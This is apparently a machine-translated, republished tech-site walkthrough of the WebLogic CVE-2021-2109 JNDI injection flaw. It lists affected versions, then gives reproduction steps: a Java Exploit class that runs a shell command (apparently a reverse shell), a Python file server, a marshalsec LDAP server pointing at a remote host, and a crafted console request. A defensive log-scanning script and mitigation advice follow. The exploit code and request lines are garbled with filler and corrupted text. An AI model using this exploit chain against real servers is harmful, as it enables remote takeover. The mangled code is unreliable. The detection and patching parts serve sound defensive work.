Shulou (Shulou.com) report, 05/31, updated 2025-01-19. SLTechnology News & Howtos > Network Security
This article analyses the WebLogic Server remote code execution vulnerability CVE-2021-2109. The content is concise and easy to follow, and I hope you take something away from the detailed introduction below.
CVE-2021-2109 Weblogic remote code execution
I. Vulnerability overview
Oracle has released an official patch that fixes several high-risk and critical vulnerabilities, including the WebLogic Server remote code execution vulnerability CVE-2021-2109. In CVE-2021-2109, an attacker can construct a malicious request that triggers JNDI injection and executes arbitrary code, thereby taking control of the server.
II. Affected versions
WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0
III. Reproducing the vulnerability
Environment: WebLogic 10.3.6.0.0 (Windows)
Log in to the admin console:
http://192.168.1.111:7001/console/login/LoginForm.jsp
Start the LDAP service. For the specific steps, see the earlier Fastjson article, "Recurrence of Fastjson 1.2.47 deserialization vulnerability":
https://mp.weixin.qq.com/s/69NCDDSaa07YY7DwyC9fgA
Save the following exploit as Exploit.java:
Import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;public class Exploit {public Exploit () throws Exception {/ / Process p = Runtime.getRuntime (). Exec (new String [] {"cmd", "/ c", "calc.exe"}); Process p = Runtime.getRuntime (). Exec (new String [] {"/ bin/bash", "- c", "exec 5devxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxpxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx BufferedReader reader = new BufferedReader (new InputStreamReader (is)); String line; while ((line = reader.readLine ())! = null) {System.out.println (line);} p.waitFor (); is.close (); reader.close (); p.destroy ();} public static void main (String [] args) throws Exception {}}
Compile it with javac Exploit.java to produce Exploit.class.
Start a web server with Python:
python -m SimpleHTTPServer 1111
With the HTTP service serving the exploit started via Python, start the LDAP service (or the RMI service):
This reproduction uses the LDAP service; the corresponding RMI steps were also captured in screenshots. Which of the two works depends on the JDK version, since RMI and LDAP each work only with certain JDK versions, and the JDK in this environment is one that LDAP supports (pay attention to the JDK version; it is the key to success).
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://XX.XX.XX.XX:1111/#Exploit 999
Capture the request to the console's JNDI binding page and modify it:
GET / console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle (% 22ldaplapplash rv:84.0) HTTP/1.1Host: 192.168.1.111:7001User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh Gzip, deflateReferer: http://192.168.1.111:7001/console/login/LoginForm.jspConnection: closeCookie: ADMINCONSOLESESESSION UXojCN1OOOOOF FkguAuuU35Z6tZ2guzmMUTskIjOizb35HOL6AwZClClure: 2080081994; JSESSIONIDopia sKsgWcOgre9zQdntt3QYv14IleXkZ94jYtY4fEIOdNBaQtBeVcoding: 18779164Upgravity request: 1
POC:
GET / console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle (% 22ldaplapplash HTTP/1.1 192.168.1Trachexxxxxxxxxxxx) HTTP/1.1
Result of successful execution:
Demo video: https://mp.weixin.qq.com/s/nTfnRlAbAa7WjLsCBRx30g
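As an added defender-side example (not code from the original article), the following Python scans access-log lines for the request shape shown above: a GET to /console/consolejndi.portal whose JNDIBindingPortlethandle decodes to a remote JNDI URL. The log lines, the client addresses and the 10.0.0.9 LDAP address are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (common log format); not taken from the page.
# Line 1 mirrors the shape of the console request shown in the write-up, with a
# made-up LDAP URL; lines 2 and 3 are benign console traffic.
SAMPLE_LOG = """\
192.168.1.50 - - [31/May/2021:10:00:01 +0800] "GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://10.0.0.9:999/Exploit%22) HTTP/1.1" 200 512
192.168.1.51 - - [31/May/2021:10:00:02 +0800] "GET /console/console.portal?_nfpb=true HTTP/1.1" 200 8192
192.168.1.52 - - [31/May/2021:10:00:03 +0800] "GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22java:comp/env/jdbc/ds%22) HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# JNDI providers that make the console resolve a name on a remote server.
# A legitimate binding lookup names an in-tree object such as java:comp/env/...
REMOTE_SCHEMES = ("ldap:", "ldaps:", "rmi:", "iiop:")


def remote_jndi_refs(target):
    """Return the decoded JndiBindingHandle values in a request target that point at
    a remote JNDI provider; an empty list means the request looks like a normal lookup."""
    url = urlsplit(target)
    if not url.path.endswith("/console/consolejndi.portal"):
        return []
    hits = []
    for value in parse_qs(url.query).get("JNDIBindingPortlethandle", []):
        # parse_qs decoded once already; decode again so double-encoding cannot hide the scheme
        decoded = unquote(value)
        if "JndiBindingHandle" in decoded and any(s in decoded.lower() for s in REMOTE_SCHEMES):
            hits.append(decoded)
    return hits


def scan_log(text):
    """Scan access-log text; return one finding per request carrying a remote JNDI handle."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        refs = remote_jndi_refs(m["target"])
        if refs:
            findings.append({"src": m["src"], "ts": m["ts"],
                             "status": m["status"], "handle": refs[0]})
    return findings
```

Because the console issues this lookup as a GET, the handle lands in the query string of ordinary access logs; the scan only alerts, so the official patch in section IV remains the actual fix.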
IV. Security recommendations
1. Disable the T3 protocol
If you do not rely on the T3 protocol for JVM communication, you can mitigate the impact of this vulnerability by temporarily blocking T3.
1) In the WebLogic console, open the base_domain configuration page, go to the "Security" tab, click "Filter" and configure the connection filter.
2) Enter weblogic.security.net.ConnectionFilterImpl as the connection filter, and enter "* * 7001 deny t3 t3s" in the connection filter rules box.
2. Disable IIOP
Log in to the WebLogic console, find the option that enables IIOP, uncheck it, and restart for the change to take effect.
3. Temporarily block external access to the console at /console/console.portal.
4. Apply the official security patch.
The above is the analysis of the WebLogic Server remote code execution vulnerability CVE-2021-2109. Have you learned the knowledge or skills? If you want to learn more skills or enrich your knowledge, you are welcome to follow the industry information channel.